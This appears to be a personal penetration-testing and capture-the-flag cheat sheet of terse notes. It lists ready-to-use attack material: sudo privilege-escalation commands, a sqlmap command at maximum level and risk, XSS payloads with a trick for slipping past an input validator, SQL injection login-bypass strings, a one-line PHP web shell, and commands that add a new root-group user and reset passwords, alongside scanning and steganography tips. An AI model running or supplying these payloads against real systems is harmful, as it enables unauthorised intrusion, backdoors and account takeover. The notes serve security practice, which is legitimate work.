sudo -u *username* *command* may give you access to run the command as that user
e.g. sudo - u root /bin/bash
for sql injection with burp, intercept and capture the request, save it as .req and give to sqlmap.
eg. sqlmap -r login.req --level 5 --risk 3
PAYLOAD+STACK++%3E%27" /Autofocus /Onfocus=confirm1//&error=1
The first part of the payload “PAYLOAD STACK” ensures that the rest of the payload is sent through.
If I entered: ++%3E%27" /Autofocus /Onfocus=confirm1//&error=1 Without the words in front of it,
the application would reject it and nothing would appear on the page. Entering something non-malicious to begin would trick the validator, and in turn, allow the payload to execute.book.php?name=home%22-confirm
1-%22 --- for xss add payload " %22-confirm1-%22 "
Sidenote: If you’re a bug bounty hunter, it’s always best to use alert(document.domain) instead of alert(1) –
it tells you if the payload is actually firing on a domain that is in scope for the program.
"x><img src=a onerror=alert(1)>
sudo -l -- checks for files you can access to as root
sudo 'the file' bash ..... you are now root
run as root or any user --- sudo -H -u root
sudo -u user -i /bin/bash ---switch user
IPPSEC TIPS
nmap -sC -sV -oA target
always run directory enumeration on web applications. u may find something juicy.
host file on local server
python -m SimpleHTTPServer
simple php web reverse shell
<?php system($_GET['gimme']); ?>
STEGANOGRAPHY
strings image.jpg
binwalk image.jpg
steghide extract -sf image.jpg
Bypassing web application firewalls using HTTP headers
There is also a hit-list of *types* of addresses/configurations that *might* be whitelisted/vulnerable. (some fictitious examples below):
sql login bypass
n'or 1=1 limit 1-- -+
'or''='
' or 1=1#
linux add new root user
useradd -m -g root username
change user password
echo username:password | chpasswd
echo "username:newpass"|chpasswd